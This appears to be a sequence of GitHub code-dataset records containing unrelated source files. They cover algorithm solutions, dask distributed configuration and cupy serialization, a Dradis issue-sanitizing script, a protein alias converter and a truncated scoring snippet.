일반 색과 동일한 로직 적용\n # 빨간색일때\n if chess_pan[moved_y][moved_x] == 1:\n existed.reverse()\n if chess_ground[moved_y][moved_x] == 0:\n chess_ground[moved_y][moved_x] = existed\n else:\n chess_ground[moved_y][moved_x] = chess_ground[moved_y][moved_x] + existed\n elif chess_pan[moved_y][moved_x] == 0:\n if chess_ground[moved_y][moved_x] == 0:\n chess_ground[moved_y][moved_x] = existed\n else:\n chess_ground[moved_y][moved_x] = existed + chess_ground[moved_y][moved_x]\n for exist in existed:\n position = chess_position_info[exist][2]\n chess_position_info[exist] = [moved_y, moved_x, position]\n # 파란색 마주치지 않았을 때\n else:\n if chess_pan[moved_y][moved_x] == 1:\n existed.reverse()\n if chess_ground[moved_y][moved_x] == 0:\n chess_ground[moved_y][moved_x] = existed\n # 이미 존재할때\n else:\n chess_ground[moved_y][moved_x] = chess_ground[moved_y][moved_x] + existed\n elif chess_pan[moved_y][moved_x] == 0:\n if chess_ground[moved_y][moved_x] == 0:\n chess_ground[moved_y][moved_x] = existed\n # 이미 존재할 때\n else:\n chess_ground[moved_y][moved_x] = existed + chess_ground[moved_y][moved_x]\n for exist in existed:\n position = chess_position_info[exist][2]\n chess_position_info[exist] = [moved_y, moved_x, position]\n\n # if len(chess_ground[moved_y][moved_x]) >= 4:\n # flag = True\n # if flag == True:\n # break\n for i in range(N + 2):\n for j in range(N + 2):\n if chess_ground[i][j] != 0:\n if len(chess_ground[i][j]) >= 4:\n flag = True\n if flag == True:\n break\n\n\nprint(cnt)","repo_name":"blueboy1593/algorithm","sub_path":"A형역량테스트대비(SWER)/17837새로운게임2.py","file_name":"17837새로운게임2.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29256327018","text":"from __future__ import annotations\n\nimport asyncio\nimport logging.config\nimport os\nimport sys\nfrom collections.abc import Callable\nfrom typing import Any\n\nimport yaml\n\nimport dask\nfrom dask.utils import import_required\n\nconfig = dask.config.config\n\n\nfn = os.path.join(os.path.dirname(__file__), \"distributed.yaml\")\n\nwith open(fn) as f:\n defaults = yaml.safe_load(f)\n\ndask.config.update_defaults(defaults)\n\ndeprecations = {\n \"allowed-failures\": \"distributed.scheduler.allowed-failures\",\n \"bandwidth\": \"distributed.scheduler.bandwidth\",\n \"default-data-size\": \"distributed.scheduler.default-data-size\",\n \"work-stealing\": \"distributed.scheduler.work-stealing\",\n \"worker-ttl\": \"distributed.scheduler.worker-ttl\",\n \"multiprocessing-method\": \"distributed.worker.multiprocessing-method\",\n \"use-file-locking\": \"distributed.worker.use-file-locking\",\n \"profile-interval\": \"distributed.worker.profile.interval\",\n \"profile-cycle-interval\": \"distributed.worker.profile.cycle\",\n \"worker-memory-target\": \"distributed.worker.memory.target\",\n \"worker-memory-spill\": \"distributed.worker.memory.spill\",\n \"worker-memory-pause\": \"distributed.worker.memory.pause\",\n \"worker-memory-terminate\": \"distributed.worker.memory.terminate\",\n \"heartbeat-interval\": \"distributed.client.heartbeat\",\n \"compression\": \"distributed.comm.compression\",\n \"connect-timeout\": \"distributed.comm.timeouts.connect\",\n \"tcp-timeout\": \"distributed.comm.timeouts.tcp\",\n \"default-scheme\": \"distributed.comm.default-scheme\",\n \"socket-backlog\": \"distributed.comm.socket-backlog\",\n \"diagnostics-link\": \"distributed.dashboard.link\",\n \"bokeh-export-tool\": \"distributed.dashboard.export-tool\",\n \"tick-time\": 
\"distributed.admin.tick.interval\",\n \"tick-maximum-delay\": \"distributed.admin.tick.limit\",\n \"log-length\": \"distributed.admin.log-length\",\n \"log-format\": \"distributed.admin.log-format\",\n \"pdb-on-err\": \"distributed.admin.pdb-on-err\",\n \"ucx\": \"distributed.comm.ucx\",\n \"rmm\": \"distributed.rmm\",\n # low-level-log-length aliases\n \"transition-log-length\": \"distributed.admin.low-level-log-length\",\n \"distributed.scheduler.transition-log-length\": \"distributed.admin.low-level-log-length\",\n \"distributed.scheduler.events-log-length\": \"distributed.admin.low-level-log-length\",\n \"recent-messages-log-length\": \"distributed.admin.low-level-log-length\",\n \"distributed.comm.recent-messages-log-length\": \"distributed.admin.low-level-log-length\",\n}\n\n# Affects yaml and env variables configs, as well as calls to dask.config.set()\n# before importing distributed\ndask.config.rename(deprecations)\n# Affects dask.config.set() from now on\ndask.config.deprecations.update(deprecations)\n\n\n#########################\n# Logging specific code #\n#########################\n#\n# Here we enact the policies in the logging part of the configuration\n\nlogger = logging.getLogger(__name__)\n\n\nif sys.version_info >= (3, 11):\n _logging_get_level_names_mapping = logging.getLevelNamesMapping\nelse:\n\n def _logging_get_level_names_mapping() -> dict[str, int]:\n return logging._nameToLevel.copy()\n\n\ndef _initialize_logging_old_style(config: dict[Any, Any]) -> None:\n \"\"\"\n Initialize logging using the \"old-style\" configuration scheme, e.g.:\n {\n 'logging': {\n 'distributed': 'info',\n 'tornado': 'critical',\n 'tornado.application': 'error',\n }\n }\n \"\"\"\n loggers: dict[str, str | int] = { # default values\n \"distributed\": \"info\",\n \"distributed.client\": \"warning\",\n \"bokeh\": \"error\",\n \"tornado\": \"critical\",\n \"tornado.application\": \"error\",\n }\n base_config = _find_logging_config(config)\n loggers.update(base_config.get(\"logging\", {}))\n\n handler = logging.StreamHandler(sys.stderr)\n handler.setFormatter(\n logging.Formatter(\n dask.config.get(\"distributed.admin.log-format\", config=config)\n )\n )\n logging_names = _logging_get_level_names_mapping()\n for name, raw_level in sorted(loggers.items()):\n level = (\n logging_names[raw_level.upper()]\n if isinstance(raw_level, str)\n else raw_level\n )\n logger = logging.getLogger(name)\n logger.setLevel(level)\n\n # Ensure that we're not registering the logger twice in this hierarchy.\n anc = logging.getLogger(None)\n already_registered = False\n\n for ancestor in name.split(\".\"):\n if anc.handlers:\n already_registered = True\n break\n anc.getChild(ancestor)\n\n if not already_registered:\n logger.addHandler(handler)\n logger.propagate = False\n\n\ndef _initialize_logging_new_style(config: dict[Any, Any]) -> None:\n \"\"\"\n Initialize logging using logging's \"Configuration dictionary schema\".\n (ref.: https://docs.python.org/3/library/logging.config.html#configuration-dictionary-schema)\n \"\"\"\n base_config = _find_logging_config(config)\n logging.config.dictConfig(base_config.get(\"logging\")) # type: ignore[arg-type]\n\n\ndef _initialize_logging_file_config(config: dict[Any, Any]) -> None:\n \"\"\"\n Initialize logging using logging's \"Configuration file format\".\n (ref.: https://docs.python.org/3/howto/logging.html#configuring-logging)\n \"\"\"\n base_config = _find_logging_config(config)\n logging.config.fileConfig(\n base_config.get(\"logging-file-config\"), # type: 
ignore[arg-type]\n disable_existing_loggers=False,\n )\n\n\ndef _find_logging_config(config: dict[Any, Any]) -> dict[Any, Any]:\n \"\"\"\n Look for the dictionary containing logging-specific configurations,\n starting in the 'distributed' dictionary and then trying the top-level\n \"\"\"\n logging_keys = {\"logging-file-config\", \"logging\"}\n if logging_keys & config.get(\"distributed\", {}).keys():\n return config[\"distributed\"]\n else:\n return config\n\n\ndef initialize_logging(config: dict[Any, Any]) -> None:\n base_config = _find_logging_config(config)\n if \"logging-file-config\" in base_config:\n if \"logging\" in base_config:\n raise RuntimeError(\n \"Config options 'logging-file-config' and 'logging' are mutually exclusive.\"\n )\n _initialize_logging_file_config(config)\n else:\n log_config = base_config.get(\"logging\", {})\n if \"version\" in log_config:\n # logging module mandates version to be an int\n log_config[\"version\"] = int(log_config[\"version\"])\n _initialize_logging_new_style(config)\n else:\n _initialize_logging_old_style(config)\n\n\ndef get_loop_factory() -> Callable[[], asyncio.AbstractEventLoop] | None:\n event_loop = dask.config.get(\"distributed.admin.event-loop\")\n if event_loop == \"uvloop\":\n uvloop = import_required(\n \"uvloop\",\n \"The distributed.admin.event-loop configuration value \"\n \"is set to 'uvloop' but the uvloop module is not installed\"\n \"\\n\\n\"\n \"Please either change the config value or install one of the following\\n\"\n \" conda install uvloop\\n\"\n \" pip install uvloop\",\n )\n return uvloop.new_event_loop\n if event_loop in {\"asyncio\", \"tornado\"}:\n if sys.platform == \"win32\":\n # ProactorEventLoop is not compatible with tornado 6\n # fallback to the pre-3.8 default of Selector\n # https://github.com/tornadoweb/tornado/issues/2608\n return asyncio.SelectorEventLoop\n return None\n raise ValueError(\n \"Expected distributed.admin.event-loop to be in ('asyncio', 'tornado', 'uvloop'), got %s\"\n % dask.config.get(\"distributed.admin.event-loop\")\n )\n\n\ninitialize_logging(dask.config.config)\n","repo_name":"dask/distributed","sub_path":"distributed/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7826,"program_lang":"python","lang":"en","doc_type":"code","stars":1499,"dataset":"github-code","pt":"99"} +{"seq_id":"29256749348","text":"\"\"\"\nEfficient serialization GPU arrays.\n\"\"\"\nfrom __future__ import annotations\n\nimport copyreg\n\nimport cupy\n\nfrom distributed.protocol.cuda import cuda_deserialize, cuda_serialize\nfrom distributed.protocol.serialize import (\n dask_deserialize,\n dask_serialize,\n register_generic,\n)\n\ntry:\n from distributed.protocol.rmm import (\n dask_deserialize_rmm_device_buffer as dask_deserialize_cuda_buffer,\n )\nexcept ImportError:\n from distributed.protocol.numba import (\n dask_deserialize_numba_array as dask_deserialize_cuda_buffer,\n )\n\n\n@cuda_serialize.register(cupy.ndarray)\ndef cuda_serialize_cupy_ndarray(x):\n # Making sure `x` is behaving\n if not (x.flags[\"C_CONTIGUOUS\"] or x.flags[\"F_CONTIGUOUS\"]):\n x = cupy.array(x, copy=True)\n\n header = x.__cuda_array_interface__.copy()\n header[\"strides\"] = tuple(x.strides)\n frames = [\n cupy.ndarray(\n shape=(x.nbytes,), dtype=cupy.dtype(\"u1\"), memptr=x.data, strides=(1,)\n )\n ]\n\n return header, frames\n\n\n@cuda_deserialize.register(cupy.ndarray)\ndef cuda_deserialize_cupy_ndarray(header, frames):\n (frame,) = frames\n arr = cupy.ndarray(\n shape=header[\"shape\"],\n 
dtype=header[\"typestr\"],\n memptr=cupy.asarray(frame).data,\n strides=header[\"strides\"],\n )\n return arr\n\n\n@dask_serialize.register(cupy.ndarray)\ndef dask_serialize_cupy_ndarray(x):\n header, frames = cuda_serialize_cupy_ndarray(x)\n frames = [memoryview(cupy.asnumpy(f)) for f in frames]\n return header, frames\n\n\n@dask_deserialize.register(cupy.ndarray)\ndef dask_deserialize_cupy_ndarray(header, frames):\n frames = [dask_deserialize_cuda_buffer(header, frames)]\n arr = cuda_deserialize_cupy_ndarray(header, frames)\n return arr\n\n\ntry:\n from packaging.version import Version\n\n if Version(cupy.__version__) >= Version(\"12\"):\n from cupyx.cusparse import MatDescriptor\n else:\n from cupy.cusparse import MatDescriptor\n from cupyx.scipy.sparse import spmatrix\nexcept ImportError:\n MatDescriptor = None\n spmatrix = None\n\n\nif MatDescriptor is not None:\n\n def reduce_matdescriptor(other):\n # Pickling MatDescriptor errors\n # xref: https://github.com/cupy/cupy/issues/3061\n return MatDescriptor.create, ()\n\n copyreg.pickle(MatDescriptor, reduce_matdescriptor)\n\n @cuda_serialize.register(MatDescriptor)\n @dask_serialize.register(MatDescriptor)\n def serialize_cupy_matdescriptor(x):\n header, frames = {}, []\n return header, frames\n\n @cuda_deserialize.register(MatDescriptor)\n @dask_deserialize.register(MatDescriptor)\n def deserialize_cupy_matdescriptor(header, frames):\n return MatDescriptor.create()\n\n\nif spmatrix is not None:\n for n, s, d in [\n (\"cuda\", cuda_serialize, cuda_deserialize),\n (\"dask\", dask_serialize, dask_deserialize),\n ]:\n register_generic(spmatrix, n, s, d)\n","repo_name":"dask/distributed","sub_path":"distributed/protocol/cupy.py","file_name":"cupy.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":1499,"dataset":"github-code","pt":"99"} +{"seq_id":"41148782022","text":"from sys import stdin\n\n# edge cases:\n# _ asking a city with no outgoing edges\n# _ two independent subgraphs\nN = int(input())\ncities = {}\nfor n in range(N):\n\torig, dst = stdin.readline().split()\n\tcities.setdefault(orig, []).append(dst)\n\tcities.setdefault(dst, [])\n\n# None-unknown, True-safe/marked, False-trapped\nsafe = {}\ndef visit(c):\n\ts = safe.get(c)\n\tif s == None:\n\t\tsafe[c] = True\n\t\ts = False\n\t\tfor dst in cities[c]:\n\t\t\ts |= visit(dst)\n\t\tsafe[c] = s\n\treturn s\n\nfor l in stdin:\n\tl = l.rstrip()\n\tprint('%s %s'%(l, 'safe' if visit(l) else 'trapped'))\n","repo_name":"traffaillac/traf-kattis","sub_path":"runningmom.py","file_name":"runningmom.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27662432007","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass List:\n def __init__(self):\n self.head = None\n\n def insert(self, data):\n newNode = Node(data)\n if self.head is None:\n self.head = newNode\n else:\n cur = self.head\n while cur.next is not None:\n cur = cur.next\n cur.next = newNode\n\n def printList(self):\n if self.head is None:\n print('List is Empty')\n else:\n cur = self.head\n while cur is not None:\n print(cur.data)\n cur = cur.next\n\n\nx = List()\nx.printList()\nx.insert(2)\nx.insert(4)\nx.insert(45)\nx.insert(43)\nx.printList()\n","repo_name":"kunaly1038/Python","sub_path":"Basic 
Programs/singleLinkedList.py","file_name":"singleLinkedList.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24513222153","text":"# Problem: 1106. Parsing A Boolean Expression\n# Difficulty: HARD\n# Last submitted: 2022-11-05 13:55:09 +0800 CST\n# Language: python3\n# Author: ZrjaK\n\nclass Solution:\n    def parseBoolExpr(self, expression: str) -> bool:\n        stk = []\n        for c in expression:\n            if c == ',':\n                continue\n            if c != ')':\n                stk.append(c)\n                continue\n            t = f = 0\n            while stk[-1] != '(':\n                if stk.pop() == 't':\n                    t += 1\n                else:\n                    f += 1\n            stk.pop()\n            op = stk.pop()\n            if op == '!':\n                stk.append('t' if f == 1 else 'f')\n            elif op == '&':\n                stk.append('t' if f == 0 else 'f')\n            elif op == '|':\n                stk.append('t' if t else 'f')\n        return stk[-1] == 't'","repo_name":"ZrjaK/algorithm","sub_path":"OJ/leetcode/1106.解析布尔表达式.py","file_name":"1106.解析布尔表达式.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31613808020","text":"from sys import stdin as s\r\nimport heapq\r\n#s = open(\"input.txt\",\"rt\")\r\nN,D = map(int, s.readline().split())\r\ngraph = [[] for _ in range(D+1)]\r\n\r\n# Read in the graph data\r\n# Add edges for moving forward 1 unit at a time \r\n# (next node, distance)\r\nfor i in range(D):\r\n    graph[i].append((i+1,1))\r\n# Read in the shortcut data\r\nfor _ in range(N):\r\n    start, end, length = map(int, s.readline().split())\r\n    if end > D :\r\n        continue # skip shortcuts that end past the destination\r\n\r\n    graph[start].append((end,length))\r\n\r\n# table storing single source shortest path info\r\ninf = 987654321\r\ndistance = [inf] * (D+1)\r\ndistance[0] = 0 \r\n\r\nq = []\r\nheapq.heappush(q,(0,0)) # start node is 0 (priority=distance, destination node) \r\nwhile q:\r\n    dist, now = heapq.heappop(q) # distance to the current node, the current node\r\n\r\n    # skip if larger than the distance already recorded in distance\r\n    if distance[now] < dist :\r\n        continue \r\n\r\n    for connection in graph[now] :\r\n        # connection[0] = destination node\r\n        # connection[1] = distance\r\n        cost = dist + connection[1] # distance up to now + distance to the next node\r\n        if (distance[connection[0]] > cost):\r\n            distance[connection[0]] = cost\r\n            heapq.heappush(q,(cost,connection[0]))\r\n    \r\nprint(distance[D])","repo_name":"kjimin0619/ps-practice","sub_path":"백준/Silver/1446. 
지름길/지름길.py","file_name":"지름길.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11333010344","text":"\"\"\"\nCustom exception class and helper functions for exception\nhandling and logging.\n\"\"\"\nimport sys\nfrom typing import Any\n\nfrom src.middleware.logger import logger\n\n\nclass CustomException(Exception):\n \"\"\"Custom exception class for handling specific exceptions.\"\"\"\n\n def __init__(self, error_message: Any, error_detail: Any):\n self.error_message = error_message_detail(\n error_message, error_detail=error_detail\n )\n\n def __str__(self) -> str:\n return self.error_message\n\n\ndef error_message_detail(error: Any, error_detail: Any) -> str:\n \"\"\"Format and log error details,\n and return the error messages a string.\"\"\"\n _, _, exc_tb = error_detail.exc_info()\n if exc_tb is None:\n raise CustomException(error, sys) from error\n file_name = exc_tb.tb_frame.f_code.co_filename\n logger.error(\n \"Error occurred in python script name [%s] \"\n \"line number [%d] error message [%s]\",\n file_name,\n exc_tb.tb_lineno,\n str(error),\n )\n return str(error)\n\n\nif __name__ == \"__main__\":\n try:\n _ = 1 / 0\n except Exception as e:\n logger.debug(\"Test CustomException\")\n raise CustomException(e, sys) from e\n","repo_name":"KarthikUdyawar/passwordometer","sub_path":"src/middleware/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41782390026","text":"from sys import stdin\ninput = stdin.readline\n\nn = int(input())\ntemp = []\nfor _ in range(n):\n age, name = map(str,input().split())\n age = int(age)\n temp.append((age,name))\ntemp.sort(key = lambda x:x[0])\nfor i in temp:\n print(i[0],i[1])","repo_name":"seongddiyong/practice_coding","sub_path":"python/정렬/b10814.py","file_name":"b10814.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72981236806","text":"from pydradis3 import Pydradis3\nfrom json import dumps\nfrom sys import argv, exit, version\nfrom argparse import ArgumentParser\nimport time\nimport datetime\nimport re\n\n#### Not even started! ####\nclass EvidenceJanitorScript(object):\n def __init__(self):\n self.arg = self.processArguments()\n if len(argv) != 4:\n print(\"Possibly missing arguments. 
Try HELP\")\n exit(-6)\n # Dradis API Configuration\n self.verifyCert = True # change this to make requests without verifying\n self.dradisApiToken = self.arg.dradisApiToken\n self.dradisProjectId = self.arg.dradisProjectId\n self.dradisUrl = self.arg.dradisUrl\n self.dradisDebug = False\n self.dradisSession = Pydradis3(self.dradisApiToken, self.dradisUrl, self.dradisDebug, self.verifyCert)\n \n def run(self):\n try:\n self.issueCleaner(self.dradisProjectId)\n except Exception as e:\n print('Failed in run: {0}'.format(e))\n exit(-1)\n self.dradisSession = None\n return 0\n\n def stripTrash(self, dirtyText: str):\n sanitizedText = dirtyText.replace('\"','"').replace(\"'\",\"'\").replace(\"<\",\"<\").replace(\">\",\">\").replace(\"&\",\"&\")\n return sanitizedText\n\n def issueCleaner(self, projectId):\n # Remove bad XML characters from Dradis issues\n today = str(datetime.datetime.now())\n newCveSite = 'https://cvedetails.com/cve/'\n refPattern = re.compile(r'References')\n cvePattern = re.compile(r'CVE_ID')\n cwePattern = re.compile(r'CWE_ID')\n modulePattern = re.compile(r'Module_OTGv4')\n touchedByPattern = re.compile(r'Touched_By')\n\n issueList = self.dradisSession.get_issuelist(pid=projectId)\n\n # Loop over every primary issue (highest level JSON object) in the dict containing all Dradis issues\n for issueEntry in issueList:\n issueId = issueEntry[1]\n print(\"Sanitizing issue {0}...\".format(issueId))\n issue = self.dradisSession.get_issue(pid=projectId, issue_id=issueId)\n sanitizedFields = []\n # Loop over every field and value within each Dradis issue\n issueTitle = issueModules = issueText = frankenstein = '' \n cweField = '\\r\\n#[CWE_ID]#\\r\\n'\n cveField = '\\r\\n#[CVE_ID]#\\r\\n'\n endOfIssue = realEndOfIssue = 0\n for key, value in issue.items():\n # Storing current issue title, for debugging\n if key == 'title':\n issue_title = self.stripTrash(str(issue[key]))\n issueTitle = \"#[Title]#\\r\\n\" + issue_title + \"\\r\\n\\r\\n\"\n\n # Appending the entirety of the current issue into a string variable\n if key == 'text':\n issueText = self.stripTrash(str(issue[key]))\n realEndOfIssue = len(issueText)\n myEnd = re.search(modulePattern, issue[key])\n touchMe = re.search(touchedByPattern, issue[key])\n if not touchMe:\n if myEnd:\n x = myEnd.start() - 2\n y = myEnd.end() + 2\n endOfIssue = len(issueText) - x\n issueModules = myEnd.string[x:]\n else:\n issueModules = \"#[Module_OTGv4]#\\r\\n\\r\\n#[Module_PCIDSS32]#\\r\\n\\r\\n#[Module_HIPAA]#\\r\\n\\r\\n#[Module_NIST53]#\\r\\n\\r\\n#[Module_ISO27K2013]#\\r\\n\\r\\n#[Module_GDPR2016]#\\r\\n\\r\\n#[Touched_By]#\\r\\nCVE_Bot_\" + today + \"\\r\\n\\r\\n\"\n else:\n a = touchMe.start() - 2\n b = touchMe.end() + 2\n if myEnd:\n y = myEnd.start() - 2\n z = myEnd.end() + 2\n issueModules = myEnd.string[y:z]\n else:\n issueModules = \"#[Module_OTGv4]#\\r\\n\\r\\n#[Module_PCIDSS32]#\\r\\n\\r\\n#[Module_HIPAA]#\\r\\n\\r\\n#[Module_NIST53]#\\r\\n\\r\\n#[Module_ISO27K2013]#\\r\\n\\r\\n#[Module_GDPR2016]#\\r\\n\\r\\n\"\n\n # 'Fields' is a JSON parameter that contains its own JSON parameters, so it is its own dict. 
Loop over it to dig inside each issue.\n if key == 'fields':\n fields = value\n # Looping over every key and value of the fields dict\n for cey, falue in fields.items():\n sanitizedFormattedValue = \"#[{0}]#\\r\\n{1}\\r\\n\\r\\n\".format(cey, self.stripTrash(str(fields[cey])))\n if cey != 'Touched_By':\n sanitizedFields.append(sanitizedFormattedValue)\n else:\n sanitizedFields.append(\"#[{0}]#\\r\\nJanitor_Bot_{1}\\r\\n\\r\\n\".format(cey, today))\n\n sanitizedIssueText = ''.join(str(listEntry) for listEntry in sanitizedFields)\n\n # This is the only way to do PUT or POST requests with Dradis API\n data = {'issue': {\"text\": sanitizedIssueText}}\n issueUpdate = self.dradisSession.update_issue_raw(pid=projectId, issue_id=issueId, data=data)\n return\n\n def evidenceCleaner(self):\n # Removing bad XML characters from evidence in Dradis project\n # HTTP GET request headers\n headers = {'Authorization': 'Token token={0}'.format(self.dradis_api_token), 'Dradis-Project-Id': self.dradis_project_id}\n\n\t\t# HTTP PUT request headers\n putHeaders = {'Authorization': 'Token token={0}'.format(self.dradis_api_token), 'Dradis-Project-Id': self.dradis_project_id, 'Content-Type':'application/json'}\n\n # HTTP GET request to get all issues in the specified Dradis project\n response = self.session.get(self.dradis_evidence_url, headers=headers, verify=self.verify_cert)\n\n # If the above GET request returns 200 code, let the user know, otherwise say what's wrong\n if '[200]' in str(response):\n print('HTTP 200 OK')\n else:\n print('Did not receive HTTP 200 code, probably incorrect Dradis url argument. ' + str(response))\n \n # Convert the GET response into a JSON object which will be interpreted by Python as a dict, lovely\n evidences = response.json()\n\n # Loop over every primary issue (highest level JSON object) in the dict containing all Dradis issues\n for evidence in evidences:\n # Loop over every field and value within each Dradis evidence\n issueResult = ''\n issueTitle = ''\n issue_id = ''\n evidenceText = ''\n evidenceResult = ''\n for key, value in evidence.items():\n # Code to find issue ID, which is used to identify the issue and is used in the PUT URL, very important\n if key == 'id':\n issue_id = str(issue[key])\n dradis_issue_url = self.dradis_issues_url + '/' + issue_id\n\n # Storing current issue title, for debugging\n if key == 'title':\n issue_title = self.stripTrash(str(issue[key]))\n issueTitle = \"#[Title]#\\r\\n\" + issue_title + \"\\r\\n\\r\\n\"\n #print('KEY: ' + str(key) + ' VALUE: ' + str(value)) # Listing every issue field and value just to show that it is working\n\n # Appending the entirety of the current issue into a string variable\n if key == 'text':\n evidenceText = self.stripTrash(str(evidence[key]))\n\n # 'Fields' is a JSON parameter that contains its own JSON parameters, so it is its own dict. 
Loop over it to dig inside each issue.\n if key == 'fields':\n fields = value\n # Looping over every key and value of the fields dict\n for cey, falue in fields.items():\n if cey == 'Result':\n evidenceResult = \"#[Result]#\\r\\n\" + self.stripTrash(str(fields[cey])) + \"\\r\\n\\r\\n\"\n \n frankenstein = evidenceResult\n\n # This is the only way to do PUT or POST requests with Dradis API\n issue_data = {'issue': {\"text\": frankenstein}}\n\n # The almighty HTTP PUT request to edit issues\n dradis = requests.put(dradis_evidence_url, data=dumps(issue_data), headers=putHeaders, verify=self.verify_cert)\n if dradis.status_code == 200:\n print(\"Successfully cleaned up evidence for the following issue: \" + issue_title)\n else:\n print(\"Failed cleaning up evidence for the following issue: \\n\\n{1}\\nStatus Code: {2}\\n\\n\".format(dradis.status_code, dradis.text))\n return\n\n def processArguments(self):\n # parse the arguments\n parser = ArgumentParser(epilog='\\tExample: \\r\\npython ' + argv[0] +\n \"https://dradis-pro.dev 21 xa632ghas87d393287\",\n description=\"Remove bad XML characters from Dradis issues\")\n parser.add_argument('dradisUrl', help=\"Dradis URL\")\n parser.add_argument('dradisProjectId', help=\"Dradis Project ID\")\n parser.add_argument('dradisApiToken', help=\"Dradis API token\")\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n start_time = time.time()\n scriptInstance = EvidenceJanitorScript()\n scriptInstance.run()\n print(\"\\n\\n%s seconds\" % (time.time() - start_time))\n","repo_name":"kurtwuckertjr/dradis-issue-janitorbot","sub_path":"dradisEvidenceJanitor.py","file_name":"dradisEvidenceJanitor.py","file_ext":"py","file_size_in_byte":9567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1868624568","text":"def tester():\r\n selected_food = 'Chef''s Salad'\r\n chosen_restaurant = request.args.get('restaurant')\r\n nlp = spacy.load(\"en_core_web_md\")\r\n selected_food_processed = nlp(selected_food)\r\n query_names = f\"\"\"SELECT gf.name FROM grubhub_food gf\r\n JOIN grubhub_available ga ON gf.food_id = ga.food_id\r\n JOIN grubhub_restaurant gr ON ga.restaurant_id = gr.restaurant_id\r\n WHERE gr.name = 'chick-fil-a';\"\"\"\r\n cursor = mysql.connection.cursor()\r\n cursor.execute(query_names)\r\n rows = cursor.fetchall()\r\n max_similarity = 0\r\n result = None \r\n for row in rows:\r\n row_doc = nlp(row[0])\r\n curr_similarity = selected_food_processed.similarity(row_doc)\r\n if curr_similarity > max_similarity:\r\n max_similarity = curr_similarity\r\n result = row[0]\r\n cursor.close()\r\n return {'name': result}","repo_name":"yannivu/ndfood","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25110905185","text":"\"\"\"\n\nAuthor: Janith Weeraman\n\nmethods that takes a STRINGID formatted interaction file and then outputs an interaction file with names corresponding\nto a given source or uniprot of the given source does not exist\n\n\"\"\"\n\nimport gzip, os\nimport networkx as nx\n\naliasfile = \"gz/39947.protein.aliases.v11.5.txt.gz\"\nsource_file = \"txt/ppi.tsv\"\noutput_file = \"txt/named_ppi.tsv\"\npreferred_source = \"Uniprot\"\ngraphfile = 'test.gexf'\n\n\ndef create_aliasdict(aliasfile=aliasfile):\n \"\"\"\n A method that takes a protein alias file as a gzip file and builds a dictionary with keys being STRINGIDs\n and values being 
dictionaries containing keys as sources and corresponding source-related names as values within\n the nested dict\n\n :param aliasfile: the protein alias file for an organism from STRING website\n :return: a dict with { STRINGID: { SOURCE : Name } } items\n \"\"\"\n alias_key = {} # dict to hold aliases\n\n with gzip.open(os.path.join(aliasfile), 'rt') as file:\n file.readline()\n line = file.readline()\n\n while line:\n # Split each line into it's items\n items = line.rstrip().split('\\t')\n # Get the alias list for STRINGID of current line\n # Find the aliases for the stringID in the line from the dict and put into a temp variable\n tmp = alias_key.get(items[0], {})\n # get the source for the current line\n source = items[-1]\n # Add the new source and name into the alias list dict\n tmp[source] = items[1]\n # replace the aliasdict for the current STRINGID with the one with the current source added\n alias_key[items[0]] = tmp\n line = file.readline()\n\n return alias_key\n\ndef stringidconvert(proteinlist,aliasdict=create_aliasdict(aliasfile),source='BLAST_UniProt_ID'):\n\n outputproteins = []\n for prot in proteinlist:\n aliases = aliasdict.get(prot,None)\n\n if aliases is not None:\n outputproteins.append(aliases[source])\n else:\n outputproteins.append('')\n\n return outputproteins\n\ndef id2stringdict(aliasfile=aliasfile,source='BLAST_UniProt_ID'):\n \"\"\"\n Function that will take in an aliasfile and convert it into an aliasdict dictionary. It will then create a new\n dictionary where the key is the name of a protein in the given source format andt he value is the STRING ID of the\n protein\n\n Parameters\n ----------\n aliasfile : the path to a file containing protein aliases\n source: the preferred source to have as a key. Default is BLAST_UniProt_ID\n\n Returns\n -------\n dict: dictionary of keys as source names and values as STRING IDs\n \"\"\"\n\n alias_key = create_aliasdict(aliasfile)\n\n newdict = {}\n for key,item in alias_key.items():\n newkey = item[source]\n newdict[newkey] = key\n\n return newdict\n\nif __name__ == \"__main__\":\n from cluster_drought_module_greedy import descendingdictkeys\n\n aliasdict = create_aliasdict(aliasfile)\n\n sources = {}\n numprots = len(aliasdict.keys())\n print(f\"numprots: {numprots}\")\n for item in aliasdict.values():\n for sc in item.keys():\n try:\n sources[sc] += 1\n except KeyError:\n sources[sc] = 1\n\n keys = descendingdictkeys(sources)\n print(keys)","repo_name":"Kornelius20-20/NpropRice","sub_path":"stringInteractions2namedInteractions.py","file_name":"stringInteractions2namedInteractions.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27087842698","text":"import pandas as pd\nimport logging\n\nlogger = logging.getLogger(__name__)\n\ndef get_scores(config, scores):\n scores['is_positive'] = scores['bid'] >= config['POSITIVE_BID_THR']\n bid2exponent = {'bid':[0.05,1,2,4,6],'exponent': config['HYPER_PARAMS']['bid_inverse_exponents']}\n #[1/0.05, 1.0, 1.0/2, 1.0/4.0 , 